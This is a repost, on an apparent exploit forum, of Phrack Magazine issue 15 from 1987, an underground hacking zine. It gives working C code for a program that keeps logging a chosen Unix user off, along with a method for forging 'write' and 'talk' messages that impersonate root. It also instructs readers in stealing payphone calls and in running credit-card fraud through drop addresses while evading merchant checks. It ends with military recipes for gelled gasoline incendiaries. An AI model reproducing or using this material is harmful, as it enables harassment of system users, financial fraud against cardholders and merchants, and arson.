Exploit Phrack #15

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
42826
Проверка EDB
  1. Пройдено
Автор
PHRACK
Тип уязвимости
PAPERS
Платформа
MAGAZINE
CVE
N/A
Дата публикации
1987-08-07
Phrack #15
Код:
                ===== Phrack Magazine presents Phrack 15 =====

                  ===== File 1 of 8 : Phrack 15 Intro =====



8/7/87


        So, did you miss us?  Yes, Phrack is back!  Phrack Magazine's beloved
founders, Taran King and Knight Lightning, have gone off to college, and the
recent busts (summarized completely in this month's Phrack World News) have
made it difficult to keep the magazine going.

        TK and KL have put the editorship of Phrack in the hands of Elric of
Imrryr and Sir Francis Drake.  SFD is primarily responsible for PWN.  As of
yet we have no 'Official Phrack BBS.'

        Due to various obstacles, the first issue under the new editorship is
rather small.  Fortunately, however, the overall quality of the files
presented is among the highest ever.  We've managed to keep references to
Oryan QUEST down to as little as possible and we've resisted the temptation to
include some second-rate files as "fillers."  Naturally, we're still looking
for excellent, unpublished phreak/hack/pyro/anarchy files to publish in Phrack
XVI and beyond.  If you have an article, we'd like to see it! Get in touch
with SFD or Elric when your file is ready for submission.

                                          -- Shooting Shark
                                             Contributing Editor
Note:  For now you can contact Phrack Inc. at:
Lunatic Labs: 415-278-7421 300/1200 (Sir Francis Drake or Elric of Imrryr)
Free World:   301-668-7657 300/1200/2400/9600 (Disk Jockey)


Phrack XV Table of Contents
===========================

15-1.   Phrack XV Intro by Shooting Shark                (2K)
15-2.   More Stupid Unix Tricks by Shooting Shark        (10K)
15-3.   Making Free Local Payfone Calls by Killer Smurf  (7K)
15-4.   Advanced Carding XIV by The Disk Jockey          (12K)
15-5.   Gelled Flame Fuels by Elric of Imrryr            (12K)
15-6.   PWN I:   The Scoop on Dan The Operator by KL     (19K)
15-7.   PWN II:  The July Busts by Knight Lightning      (21K)
15-8.   PWN III: The Affidavit by SFD                    (6K)



--------------------------------------------------------------------------------


                ===== Phrack Magazine presents Phrack 15 =====

                           ===== File 2 of 8 =====

I thought I had written everything there is to write about the Unix operating
system until I was recently asked to put out yet another file... so I said
"I'll try, but don't publish my file along with an article by The Radical
Rocker this time!"  These demands having been met, I booted up the PC and
threw together...

                 --- ---- ---- ------ ------ -- -- ---- -----
               % Yet Even More Stupid Things to Do With Unix! $
                 --- ---- ---- ------ ------ -- -- ---- -----

                              By Shooting Shark.
                          Submitted August 26, 1987


These two topics are methods of annoying other users of the system and
generally being a pest.  But would you want to see a file on *constructive*
things to do with Unix?  Didn't think so...


--  ------- ----- --- --- ------
1.  Keeping Users Off The System
--  ------- ----- --- --- ------

Now, we all know by now how to log users off (one way is to redirect an 'stty
0' command to their tty) but unless you have root privs, this will not work
when a user has set 'mesg n' and prevented other users from writing to their
terminal.  But even users who have a 'mesg n' command in their .login (or
.profile or .cshrc) file still have a window of vulnerability, the time
between login and the locking of their terminal.  I designed the following
program, block.c, to take advantage of this fact.

To get this source running on your favorite Unix system, upload it, call it
'block.c', and type the following at the % or $ prompt:

cc -o block block.c

once you've compiled it successfully, it is invoked like so:

block username [&]

The & is optional and recommended - it runs the program in the background,
thus letting you do other things while it's at work.

If the user specified is logged in at present, it immediately logs them out
(if possible) and waits for them to log in.  If they aren't logged in, it
starts waiting for them.  If the user is presently logged in but has their
messages off, you'll have to wait until they've logged out to start the thing
going.

Block is essentially an endless loop : it keeps checking for the occurrence of
the username in /etc/utmp.  When it finds it, it immediately logs them out and
continues.  If for some reason the logout attempt fails, the program aborts.
Normally this won't happen - the program is very quick when run unmodified.
However, to get such performance, it runs in a very tight loop and will eat up
a lot of CPU time.  Notice that near the end of the program there is the line:

/*sleep(SLEEP)   */

the /* and */ are comment delimiters - right now the line is commented out.
If you remove the comments and re-compile the program, it will then 'go to
sleep' for the number of seconds defined in SLEEP (default is 5) at the end of
every loop.  This will save the system load but will slightly decrease the
odds of catching the user during their 'window of vulnerability.'

If you have a chance to run this program at a computer lab at a school or
somewhere similar, run this program on a friend (or an enemy) and watch the
reaction on their face when they repeatedly try to log in and are logged out
before they can do *anything*.  It is quite humorous.  This program is also
quite nasty and can make you a lot of enemies!

caveat #1:  note that if you run the program on yourself, you will be logged
out, the program will continue to run (depending on the shell you're under)
and you'll have locked yourself out of the system - so don't do this!

caveat #2:  I wrote this under OSx version 4.0, which is a licensed version of
Unix which implements 4.3bsd and AT&T sysV.  No guarantees that it will work
on your system.

caveat #3:  If you run this program in background, don't forget to kill it
when you're done with it!  (when you invoke it with '&', the shell will give
you a job number, such as '[2] 90125'.  If you want to kill it later in the
same login session, type 'kill %2'.  If you log in later and want to kill it,
type 'kill 90125'.  Just read the man page on the kill command if you need any
help...

----- cut here -----

/* block.c -- prevent a user from logging in
 * by Shooting Shark
 * usage : block username [&]
 * I suggest you run this in background.
 */

#include <stdio.h>
#include <utmp.h>
#include <ctype.h>
#include <termio.h>
#include <fcntl.h>

#define W_OK2
#define SLEEP5
#define UTMP"/etc/utmp"
#define TTY_PRE "/dev/"

main(ac,av)
int ac;
char *av[];
{
int target, fp, open();
struct utmpuser;
struct termio*opts;
char buf[30], buf2[50];

if (ac != 2) {
printf("usage : %s username
",av[0]);
exit(-1);
}


for (;;) {

if ((fp = open(UTMP,0)) == -1) {
printf("fatal error!  cannot open %s.
",UTMP);
exit(-1);
}


while (read(fp, &user, sizeof user) > 0) {
if (isprint(user.ut_name[0])) {
if (!(strcmp(user.ut_name,av[1]))) {

printf("%s is logging in...",user.ut_name);
sprintf(buf,"%s%s",TTY_PRE,user.ut_line);
printf("%s
",buf);
if (access(buf,W_OK) == -1) {
printf("failed - program aborting.
");
exit(-1);
}
else {
if ((target = open(buf,O_WRONLY)) != EOF) {
sprintf(buf2,"stty 0 > %s",buf);
system(buf2);
printf("killed.
");
sleep(10);
}

} /* else */
} /* if strcmp */
} /* if isprint */
} /* while */
close(fp);

/*sleep(SLEEP);  */

} /* for */





}

----- cut here -----


--  ------------- ----- ----- ---- ------  --- ------
2.  Impersonating other users with 'write' and 'talk'
--  ------------- ----- ----- ---- ------  --- ------

This next trick wasn't exactly a work of stupefying genius, but is a little
trick (that anybody can do) that I sometimes use to amuse myself and, as with
the above, annoy the hell out of my friends and enemies.

Nearly every Unix system has the 'write' program, for conversing with other
logged-in users.  As a quick summary:

If you see that user 'clara' is logged in with the 'who' or 'w' command or
whatever, and you wish to talk to her for some reason or another, you'd type
'write clara'.  Clara then would see on her screen something like this (given
that you are username 'shark'):


[3 ^G's] Message from shark on ttyi13 at 23:14 ...

You then type away at her, and whatever you type is sent to her terminal
line-by-line.  If she wanted to make it a conversation rather than a
monologue, she'd type 'write shark,' you'd get a message similar to the above
on your terminal, and the two of you would type away at each other to your
little heart's content.  If either one of you wanted to end the conversation,
you would type a ^D.  They would then see the characters 'EOF' on their
screen, but they'd still be 'write'ing to you until they typed a ^D as well.

Now, if you're on a bigger installation you'll probably have some sort of
full-screen windowing chat program like 'talk'.  My version of talk sends the
following message:

Message from Talk_Daemon@tibsys at 23:14 ...
talk: connection requested by shark@tibsys.
talk: respond with:  talk shark@tibsys

Anyway, here's where the fun part begins:  It's quite easy to put a sample
'write' or 'talk' message into a file and then edit so that the 'from' is a
different person, and the tty is listed differently.  If you see that your
dorky friend roger is on ttyi10 and the root also happens to be logged on on
ttyi01, make the file look something like this:

[3 control-G's] Message from root on ttyi01 at [the current time]

wackawackawackawackawacka!!!

[or a similarly confusing or rude message...]

EOF

Then, send this file to roger's terminal with:

cat filename > /dev/ttyi10

He'll get the message on his terminal and wonder what the hell the superuser
is talking about.  He might even 'write' back to the superuser with the intent
of asking 'what the hell are you talking about?'.  For maximum effectiveness,
*simultaneously* send a message to root 'from' roger at the appropriate
terminal with an equally strange message - they'll then engage in a
conversation that will go something like "what did you mean by that?"  "what
do you mean, what do I mean?  What did *you* mean by that?" etc.  A splendid
time is guaranteed for all!  Note that you don't have to make 'root' the
perpetrator of the gag, any two currently logged-in users who have their
terminals open for messages can join in on the fun.

Similarly, you can fake a few 'talk' pages from/to two people...they will then
probably start talking...although the conversation will be along the lines of
"what do you want?"  "you tell me."  "you paged me, you tell *me." etcetera,
while you laugh yourself silly or something like that.

A variation on the theme:  As I said, when using 'write' you type a ^D to end
the conversation, and the person you're typing at sees an 'EOF' on their
screen.  But you could also just *type* 'EOF', and they'd think you've
quit...but you still have an open line to their terminal.  Even if they later
turn messages off, you still have the ability to write to their terminal.
Keeping this fact in mind, anybody who knows what they're doing can write a
program similar to my 'block' program above that doesn't log a user out when
they appear on the system, but opens their tty as a device and keeps the file
handle in memory so you can redirect to their terminal - to write rude
messages or to log them out or whatever - at any time, until they log out.

As I said, there was no great amount of genius in the above discourse, but
it's a pastime I enjoy occasionally...

-- Shooting Shark


"the first fact to face is that unix was not developed with security, in any
realistic sense, in mind..."

-- Dennis M. Ritchie

"Oryan QUEST couldn't hack his way out of a UNIX system, let alone into one."

-- Tharrys Ridenow


--------------------------------------------------------------------------------


                ===== Phrack Magazine presents Phrack 15 =====

                         ===== File 3 of 8 =====

*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*
*                                                                       *
*            How to "Steal" Local Calls from Most Payphones             *
*                                                                       *
*                            August 25, 1987                            *
*                                                                       *
*                   By Killer Smurf and Pax Daronicus                   *
*                                                                       *
*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*

     Most of you have seen WarGames, right? Remember the part where David
was stranded in Colorado and needed to call his girlfriend in Seattle? We
knew you did.  If you didn't, what David done was unscrew the  mouthpiece
on  the payphone and make some connection between the mouthpiece and  the
phone.  Well... that was pretty close to reality except for two things...
1> Nowadays,  mouthpieces are un-unscrewable, and 2> You cannot make long
distance  or toll calls using that method.  Maybe that DID work on  older
phones, but you know Ma Bell.  She always has a damn cure for every thing
us Phreaks do.  She glued on the mouthpiece!

     Now to make free local calls, you need a  finishing nail.  We highly
recommend "6D E.G. FINISH C/H, 2 INCH" nails.  These are about 3/32 of an
inch  in diameter and 2 inches long (of course).  You also need  a  large
size  paper  clip.  By  large  we  mean they  are  about  2  inches  long
(FOLDED).  Then  you  unfold the paper clip.  Unfold it  by  taking  each
piece  and  moving  it out 90 degrees.  When it is done  it  should  look
somewhat like this:
                             /----------\n                             :          :
                             :          :
                             :          :
                             :          :
                             -----

     Now,  on to the neat stuff.  What you do,  instead of unscrewing the
glued-on  mouthpiece,  is  insert the nail into the center  hole  of  the
mouthpiece  (where you talk) and push it in with pressure or just  hammer
it in by hitting the nail on something.  Just DON'T KILL THE  MOUTHPIECE!
You  could  damage  it if you insert the nail too far or  at  some  weird
angle.  If  this happens then the other party won't be able to hear  what
you say.
     You now have a hole in the mouthpiece in which you can easily insert
the  paper clip.  So, take out the nail and put in the paper  clip.  Then
take  the other end of the paper clip and shove it under the rubber  cord
protector at the bottom of the handset (you know, the blue guy...).  This
should end up looking remotely like...like this:

                             /----------      Mouthpiece
                             :          :      /
             Paper clip -->  :          :     /
                             :      /---:---\n                             :      :   :   :------------>
         ====================---))):       :  To earpiece ->
                   ^              ^ -------------------->
                   :              :
                   :              :
                 Cord          Blue guy

(The  paper clip is shoved under the blue guy to make a  good  connection
between the inside of the mouthpiece and the metal cord.)

     Now,  dial  the number of a local number you wish to  call,  sayyyy,
MCI.  If  everything  goes okay, it should ring and not answer  with  the
"The Call You Have Made Requires a 20 Cent Deposit" recording.  After the
other  end  answers  the phone, remove the  paper  clip.  It's  all  that
simple, see?

     There  are  a couple problems,  however.  One  is,  as  we mentioned
earlier, the mouthpiece not working after you punch it.  If this  happens
to you,  simply move on to the next payphone.  The one you are now on  is
lost.  Another problem is that the touch tones won't work when the  paper
clip is in the mouthpiece. There are two ways around this..
     A> Dial the first 6 numbers.  This should be done without the  paper
clip making the connection, i.e., one side should not be connected.  Then
connect  the paper clip,  hold down the last digit,  and slowly pull  the
paper clip out at the mouthpiece's end.
     B> Don't  use  the paper clip at all.  Keep the nail  in  after  you
punch it.  Dial the first 6 digits.  Before dialing the last digit, touch
the nail head to the plate on the main body of the phone,  the money safe
thingy..then press the last number.

     The  reason  that this method is sometimes called  clear  boxing  is
because  there is another type of phone which lets you actually make  the
call  and  listen  to  them say "Hello,  hello?"  but  it  cuts  off  the
mouthpiece  so  they can't hear you.  The Clear Box is used  on  that  to
amplify your voice signals and send it through the earpiece.  If you  see
how  this  is even slightly similar to the method we  just  described  up
there, kindly explain it to US!! Cause WE don't GET IT!

     Anyways,  this DOES work on almost all single slot,  Dial Tone First
payphones (Pacific Bell for sure).  We do it all the time.  This  is  the
least,  WE STRESS *LEAST*, risky form of Phreaking.  And remember.  There
are other Phreaks like you out there who have read this article and punch
payphones, so look before you punch, and save time.

     If  you feel the insane desire to have to contact us to bitch at  us
for  some  really stupid mistake in this article,  you can  reach  us  at
Lunatic Labs Unltd...415/278-7421.  It should be up for quite a while..


     Also,  if you think of any new ideas that can be used in conjunction
with this method, such as calling a wrong number on purpose and demanding
your quarter back from the 0perator,  tell us!!  Post it on Looney!!  Oh,
and if this only works on Pac Bell phones, tell us also!  Thanks for your
time, upload this to every board you can find.  You may use this material
in any publication - electronic, written, or otherwise without consent of
the authors as long as it is reproduced in whole, with all credit to the
authors (us!) and Lunatic Labs.  And now, the Bullshit:

_________________________________________________________________________

DISCLAIMER: This  disclaimer disclaims that this article was written  for
            your information only.  Any injuries resulting from this file
            (punctured hands, sex organs, etc.) is NOT OUR FAULT! And  of
            course  if you get really stupidly busted in any way  because
            of this, it ain't our fault either.  You're the dumb ass with
            the  nail.  So, proceed with care, but...  HELL!  Have  fun.
            Later...
_________________________________________________________________________




--------------------------------------------------------------------------------


                ===== Phrack Magazine presents Phrack 15 =====

                           ===== File 4 of 8 =====







~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~                             The Disk Jockey                                ~
~                                                                            ~
~                                presents:                                   ~
~                                                                            ~
~                          Advanced Carding XIV:                             ~
~              Clarification of Many Credit Card Misconceptions              ~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                             (A 2af Presentation)
Preface:
-------
     After reading files that have been put out by various groups and
individuals concerning carding, credit fraud, and the credit system in
general, I am finding more and more that people are basing these files on
ideas, rather than knowing how the system actually works.  In this article I
hope to enlighten you on some of the grey areas that I find most people either
do not clarify, or don't know what they are talking about.  I can safely say
that this will be the most accurate file available dealing with credit fraud.
I have worked for and against credit companies, and know how they work from
the insiders point of view, and I have yet to meet someone in the modem world
that knows it better.

This file is dedicated to all the phreaks/hacks that were busted for various
reasons in the summer of 1987.


Obtaining Cards:
---------------
     Despite popular belief, there IS a formula for Visa and Mastercard
numbers.  All credit card account numbers are issued by on issuing company, in
this case, Visa or Mastercard.  Although the banks are not aware of any type
of pattern to the account numbers, there IS one that can be found.  I plan to
publish programs in the near future that will use the various formulas for
Visa, Mastercard and American Express to create valid accounts.

Accounts:
--------
     All that is needed to successfully use a Visa/MC account is the account
number itself.  I don't know how many times I have gotten into arguments with
people over this, but this is the way it is.  I'll expand on this.

First of all, on all Visa/MC cards, the name means NOTHING.  NOTHING AT ALL.
You do not need this name and address of the cardholder to successfully use
the account, at no time during authorization is the name ever needed, and with
over 50,000 banks, credit unions, and various other financial institutions
issuing credit cards, and only 5 major credit verification services, it is
impossible to keep personal data on each cardholder.

Ordering something and having it sent with the real cardholder's name is only
going to make things more difficult, at best.  There is no way that you can
tell if the card is a normal card, or a premium (gold) card merely by looking
at the account number.  The only thing that can be told by the account number
is the bank that issued the card, but this again, is not needed.

The expiration date means nothing.  Don't believe me?  Call up an
authorization number and check a card and substitute 12/94, and if the account
number is good, the card will pass.  The expiration date is only a binary-type
check to see if the card is good, (Yes/No), it is NOT a checksum-type check
code that has to be matched up to the card account to be valid.

Carding Stupid Things:
---------------------
     Whenever anyone, ANYONE tries to card something for the first time, they
ALWAYS want to get something for their computer.  This is nice and all, but
just think that every person that has ever tried to card has tried to get a
hard drive and a new modem.  Everyone does it, thus every single computer
company out there is aware and watching for that.  If I could give every
single person who ever tries to card one piece of advice, it would be to NEVER
order computer equipment.  I know there are a hundred guys that will argue
with me about it, but common sense should tell you that the merchants are
going to go out of there way to check these cards.

Merchant Checking:
-----------------
     Since I brought up merchants checking the cards, I will review the two
basic ways that almost all mail-order merchants use.  Keep these in mind when
designing your name, address and phone number for your drop.

The Directory Assistance Cross-Reference:
----------------------------------------
     This method is most popular because it is cheap, yet effective.  You can
usually tell these types of checks because during the actual order, you are
asked questions such as "What is your HOME telephone number" and your billing
address.  Once they have this information, they can call directory assistance
for your area code, say 312, and ask "May I have the phone number for a Larry
Jerutis at 342 Stonegate Drive?"  Of course, the operator should give a number
that matches up with the one that you gave them as your home number.  If it
doesn't, the merchant knows that something is up.  Even if it is an unlisted
number, the operator will say that there is a Jerutis at that address, but the
telephone number is non-published, which is enough to satisfy the merchant.
If a problem is encountered, the order goes to a special pile that is actually
called and the merchant will talk to the customer directly.  Many merchants
have policy to not ship at all if the customer can not provide a home phone
number that corresponds with the address.

The Call Back:
-------------
     This deals with the merchant calling you back to verify the order.  This
does not imply, however, that you can stand by a payphone and wait for them to
call back.  Waiting by a payphone is one of the stupidest things I have ever
heard of, being that few, if any, places other than the pizza place will call
back immediately like that.  What most places will do is process your order,
etc, and then call you, sometimes it's the next day, sometimes that night.  It
is too difficult to predict when they will call back, but if they don't get a
hold of you, or only get a busy, or an answering machine, they won't send the
merchandise until they speak with you voice.  This method is difficult to
defeat, but fortunately, due to the high cost of phone bills, the directory
assistance method is preferred.

Billing Address:
---------------
     This should ALWAYS be the address that you are having the stuff sent to.
One of the most stupidest things that you could do to botch up a carding job
would be to say something like "Well, I don't want it sent to my house, I want
it sent to....", or "Well, this is my wife's card, and her name is....".
These methods may work, but for the most part, only rouse suspicion on you.
If the order sounds pretty straightforward, and there isn't any unusual
situations, it will better the chances of the order going through.

Drop Houses:
-----------
     These are getting harder and harder to come by for the reasons that
people are more careful then before, and that UPS is smarter, also.  Your best
bet is to hit somebody that just moved, and I mean JUST moved, being that UPS
will not know that there is nobody at the house anymore if it is within, say,
a week of their moving.  It's getting to the point where in some areas, UPS
won't even leave the stuff on the doorstep, due to liability on their part of
doing that. The old "Leave the stuff in the shrubs while I am at work" note
won't work, most people are smart enough to know that something is odd, and
will more than likely leave the packages with the neighbors before they shove
that hard drive in the bushes.  Many places, such as Cincinnati Microwave
(maker of the Escort and Passport radar detectors) require a signature when
the package is dropped off, making it that much harder.

Best Bet:
--------
     Here is the method that I use that seems to work well, despite it being a
little harder to match up names and phone numbers.  Go to an apartment
building and go to the top floor.  The trashier the place, the better.  Knock
on the door and ask if "Bill" is there.  Of course, or at least hopefully,
there will be no Bill at that address.  Look surprised, then say "Well, my
friend Bill gave me this address as being his."  The occupants will again say
"Sorry, but there is no Bill here...".  Then, say that "I just moved here to
go to school, and I had my parents sent me a bunch of stuff for school here,
thinking that this was Bill's place."  They almost always say "Oh Boy...".
Then respond with "Well, if something comes, could you hold on to it for me,
and I will come by in a week and see if anything came?"  They will always say
something to the effect of "Sure, I guess we could do that...".  Thank them a
million times for helping you out, then leave.  A few days after your stuff
comes, drop by and say, "Hi, I'm Jim, did anything come for me?".  If
everything was cool, it should have.  The best thing to do with this is only
order one or two small things, rather than an AT system with an extra monitor.
People feel more comfortable about signing for something small for someone,
rather than something big, being that most people naturally think that the
bigger it is, the more expensive it is.
     This is the best method that I know of, the apartment occupants will
usually sign for the stuff, and be more than happy to help you out.

Advice:
------
     The thing that I can never stress enough is to not become greedy.  Sure,
the first shipment may come in so easy, so risk-free that you feel as if you
can do it forever.  Well, you can't.  Eventually, if you do it frequently
enough, you will become the subject of a major investigation by the local
authorities if this becomes a real habit.  Despite anything that anyone ever
tells you about the police being "stupid and ignorant", you better reconsider.
The police force is a VERY efficient organization once they have an idea as to
who is committing these crimes.  They have the time and the money to catch
you.

Don't do it with friends.  Don't even TELL friends that you are doing it. This
is the most stupid, dangerous thing that you could do.  First of all, I don't
care how good of friends anyone may be, but if a time came that you hated each
other, this incident could be very bad for you.  What could be even worse is a
most common scenario:  You and a friend get a bunch of stuff, very
successfully.  You tell a few friends at school, either you or him have to
tell only one person and it gets all over.  Anyways, there is ALWAYS some type
of informant in every high-school.  Be it a teacher, son or daughter of a cop,
or whatever, there is always a leak in every high school.  The police decide
to investigate, and find that it is becoming common knowledge that you and/or
your friend have ways of getting stuff for "free" via the computer.  Upon
investigation, they call in your friend, and tell him that they have enough
evidence to put out a warrant for his arrest, and that they might be able to
make a deal with him.  If he gives a complete confession, and be willing to
testify against your in court, they will let him off with only paying the
restitution (paying for the stuff you got).  Of course, just about anyone is
going to think about themselves, which is understandable, and you will get the
raw end of the deal.  Don't let anyone ever tell you that as a minor, you
won't get in any trouble, because you can and will.  If you are really
uncooperative, they may have you tried as an adult, which would really put you
up the creek, and even as a juvenile, you are eligible to receive probation,
fines, court costs, and just about anything else the judge wants to do with
you.  All this boils down to is to not tell anyone anything, and try not to do
it with anyone.


Well, that should about wrap up this file.  I hope this clears up some
misconceptions about carding.  I am on many boards, and am always open to any
comments/suggestions/threats that anyone might have.  I can always be reached
on The Free World II (301-668-7657) or Lunatic Labs (415-278-7421).

Good luck.

                                                 -The Disk Jockey


--------------------------------------------------------------------------------


                ===== Phrack Magazine presents Phrack 15 =====

                         ===== File 5 of 8 =====










                        GELLED FLAME FUELS
                        ------------------

        A text phile typed by Elric of Imrryr from the book:
        Improvised Munitions Handbook (TM 31-210), published
        by the Dept of the Army, 1969.
        All information is provided only for information purposes
        only. Construction and/or use may violate local, state, and/or
        federal laws. (Unless your name is Ollie North)



        Gelled or paste type fuels are often preferable to raw gasoline for
use in incendiary devices such as fire bottles.  This type fuel adheres more
readily to the target and produces greater heat concentration.

        Several methods are shown for gelling gasoline using commonly
available materials.  The methods are divided into the following categories
based on the major ingredient:

                1. Lye Systems

                2. Lye-Alcohol Systems

                3. Soap-Alcohol Systems

                4. Egg White Systems

                6. Wax Systems



























                                   Lye Systems

    Lye (also know as caustic soda or Sodium Hydroxide) can be used in
combination with powdered rosin or castor oil to gel gasoline for use as a
flame fuel which will adhere to target surfaces.





MATERIALS REQUIRED:
------------------

Parts by Volume   Ingredient    How Used         Common Source
---------------   ----------    --------         -------------

60                Gasoline      Motor Fuel       Gas station or motor vehicle

2 (flake) or      Lye           Drain cleaner,   Food store or Drug store
1 (powder)                      making of soap

15                Rosin         Manufacturing    Paint store, chemical supply
                                Paint & Varnish  house

                  or

                  Castor Oil    Medicine         Food and Drug stores


PROCEDURE
---------

______________________________________________________________________________
|CAUTION:  Make sure that there are no open flames in the area when mixing   |
|the flame fuel.  NO SMOKING!                                                |
|----------------------------------------------------------------------------|

1. Pour gasoline into jar, bottle or other container. (DO NOT USE AN ALUMINUM
   CONTAINER.)

2. IF rosin is in cake form, crush into small pieces.

3. Add rosin or castor oil to the gasoline and stir for about five minutes to
   mix thoroughly.

4. In a second container (NOT ALUMINUM) add lye to an equal volume of water
   slowly with stirring.

______________________________________________________________________________
|CAUTION:  Lye solution can burn skin and destroy clothing.  If any is       |
|spilled, wash away immediately with large quantities of water.              |
|----------------------------------------------------------------------------|

5. Add lye solution to the gasoline mix and stir until mixture thickens (about
   one minute).

NOTE:  The sample will eventually thicken to a very firm paste.  This can be
       thinned, if desired, by stirring in additional gasoline.






                                   Lye-Alcohol Systems

    Lye (also know as caustic soda or Sodium Hydroxide) can be used in
combination with alcohol and any of several fats to gel gasoline for use as a
flame fuel.





MATERIALS REQUIRED:
------------------

Parts by Volume   Ingredient    How Used         Common Source
---------------   ----------    --------         -------------

60                Gasoline      Motor Fuel       Gas station or motor vehicle

2 (flake) or      Lye           Drain cleaner,   Food store or Drug store
1 (powder)                      making of soap

3                 Ethyl Alcohol Whiskey          Liquor store
                                Medicine         Drug store

NOTE:  Methyl (wood) alcohol or isopropyl (rubbing) alcohol can be substituted
       for ethyl alcohol, but their use produces softer gels.

14                Tallow        Food             Fats rendered by cooking the
                                Making of soap   meat or suet of animals.

NOTE: The following can be substituted for the tallow:

        (a) Wool grease (Lanolin) (very good) -- Fat extracted from sheep wool
        (b) Castor Oil (good)
        (c) Any vegetable oil (corn, cottonseed, peanut, linseed, etc.)
        (d) Any fish oil
        (e) Butter or oleo margarine

It is necessary when using substitutes (c) to (e) to double the given amount
of fat and of lye for satisfactory body.

PROCEDURE
---------

______________________________________________________________________________
|CAUTION:  Make sure that there are no open flames in the area when mixing   |
|the flame fuel.  NO SMOKING!                                                |
|----------------------------------------------------------------------------|

1. Pour gasoline into jar, bottle or other container. (DO NOT USE AN ALUMINUM
   CONTAINER.)

2. Add tallow (or substitute) to the gasoline and stir for about 1/2 minute to
   dissolve fat.

3. Add alcohol to the gasoline mixture.  Mix thoroughly.

4. In a separate container (NOT ALUMINUM) slowly add lye to an equal volume of
   water.  Mixture should be stirred constantly while adding lye.

______________________________________________________________________________
|CAUTION:  Lye solution can burn skin and destroy clothing.  If any is       |
|spilled, wash away immediately with large quantities of water.              |
|----------------------------------------------------------------------------|

5. Add lye solution to the gasoline mixture and stir occasionally until
thickened (about 1/2 hour)

NOTE:  The sample will eventually (1 to 2 days) thicken to a very firm paste.
       This can be thinned, if desired, by stirring in additional gasoline.





                                   Soap-Alcohol System

        Common household soap can be used in combination with alcohol to gel
gasoline for use as a flame fuel which will adhere to target surfaces.






MATERIALS REQUIRED:
------------------

Parts by Volume   Ingredient    How Used         Common Source
---------------   ----------    --------         -------------

36                Gasoline      Motor Fuel       Gas station or motor vehicle

1                 Ethyl Alcohol Whiskey          Liquor store
                                Medicine         Drug store

NOTE:  Methyl (wood) alcohol or isopropyl (rubbing) alcohol can be substituted
       for ethyl alcohol.

20 (powdered) or  Laundry soap  Washing clothes  Stores
28 (flake)

NOTE:  Unless the word "soap" actually appears somewhere on the container or
wrapper, a washing compound is probably a detergent. THESE CAN NOT BE USED.


PROCEDURE
---------

______________________________________________________________________________
|CAUTION:  Make sure that there are no open flames in the area when mixing   |
|the flame fuel.  NO SMOKING!                                                |
|----------------------------------------------------------------------------|

1. If bar soap is used, carve into thin flakes using a knife.

2. Pour Alcohol and gasoline into a jar, bottle or other container and mix
   thoroughly.

3. Add soap powder or flakes to gasoline-alcohol mix and stir occasionally
   until thickened (about 15 minutes).




                                   Egg System

The white of any bird egg can be used to gel gasoline for use as a flame fuel.





MATERIALS REQUIRED:
------------------

Parts by Volume   Ingredient    How Used         Common Source
---------------   ----------    --------         -------------

85                Gasoline      Motor Fuel       Gas station or motor vehicle

14                Egg Whites    Food             Food store, farms

Any one of the following

1                 Table Salt    Food, industrial Sea Water, Natural brine,
                                processes        Food stores

3                 Ground Coffee Food             Food store

3                 Dried Tea     Food             Food store
                  Leaves

3                 Cocoa         Food             Food store

2                 Sugar         Food             Food store

1                 Saltpeter     Pyrotechnics     Drug store
                  (Niter)       Explosives       chemical supply store
                  (Potassium    Matches
                  Nitrate)      Medicine

1                 Epsom salts   Medicine         Drug store, food store
                                industrial
                                processes

2                 Washing soda  Washing cleaner  Food store
                  (Sal soda)    Medicine         Drug store
                                Photography      Photo supply store

1 1/2             Baking soda   Baking           Food store
                                Manufacturing:   Drug store
                                Beverages,
                                Mineral waters,
                                and Medicine

1 1/2             Aspirin       Medicine         Drug store
                                                 Food store


PROCEDURE
---------

______________________________________________________________________________
|CAUTION:  Make sure that there are no open flames in the area when mixing   |
|the flame fuel.  NO SMOKING!                                                |
|----------------------------------------------------------------------------|

1. Separate egg white from yolk.  This can be done by breaking the egg into a
   dish and carefully removing the yolk with a spoon.


______________________________________________________________________________
|NOTE:  DO NOT GET THE YELLOW EGG YOLK MIXED INTO THE EGG WHITE.  If egg yolk|
|gets into the egg white, discard the egg.                                   |
|----------------------------------------------------------------------------|

2. Pour egg white into a jar, bottle, or other container and add gasoline.

3. Add the salt (or other additive) to the mixture and stir occasionally until
   gel forms (about 5 to 10 minutes).

NOTE:  A thicker flame fuel can be obtained by putting the capped jar in hot
       (65 C) water for about 1/2 hour and then letting them cool to room
       temperature.  (DO NOT HEAT THE GELLED FUEL CONTAINING COFFEE).





                                   Wax System

        Any of several common waxes can be used to gel gasoline for use as a
flame fuel.





MATERIALS REQUIRED:
------------------

Parts by Volume   Ingredient    How Used         Common Source
---------------   ----------    --------         -------------

80                Gasoline      Motor Fuel       Gas station or motor vehicle

20                Wax           Leather polish,  Food store, drug store,
                  (Ozocerite,   sealing wax,     department store
                  Mineral wax,  candles,
                  fossil wax,   waxed paper,
                  ceresin wax   furniture &
                  beeswax)      floor waxes,
                                lithographing.

PROCEDURE
---------

1. Melt the wax and pour into jar or bottle which has been placed in a hot
   water bath.

2. Add gasoline to the bottle.

3. When wax has completely dissolved in the gasoline, allow the water bath to
   cool slowly to room temperature.

NOTE:  If a gel does not form, add additional wax (up to 40% by volume) and
repeat the above steps.  If no gel forms with 40% wax, make a Lye solution by
dissolving a small amount of Lye (Sodium Hydroxide) in an equal amount of
water.  Add this solution (1/2% by volume) to the gasoline wax mix and shake
bottle until a gel forms.




Well, that's it, I omitted a few things because they where either redundant,
or more aimed toward battle field conditions. Be careful, don't get caught,
and have fun...

        Elric of Imrryr


--------------------------------------------------------------------------------


          PWN ^*^ PWN ^*^ PWN {  Final Issue  } PWN ^*^ PWN ^*^ PWN
          ^*^                                                   ^*^
          PWN                Phrack World News                  PWN
          ^*^               Issue XV:  Part One                 ^*^
          PWN                                                   PWN
          ^*^          Created, Written, and Edited             ^*^
          PWN               by Knight Lightning                 PWN
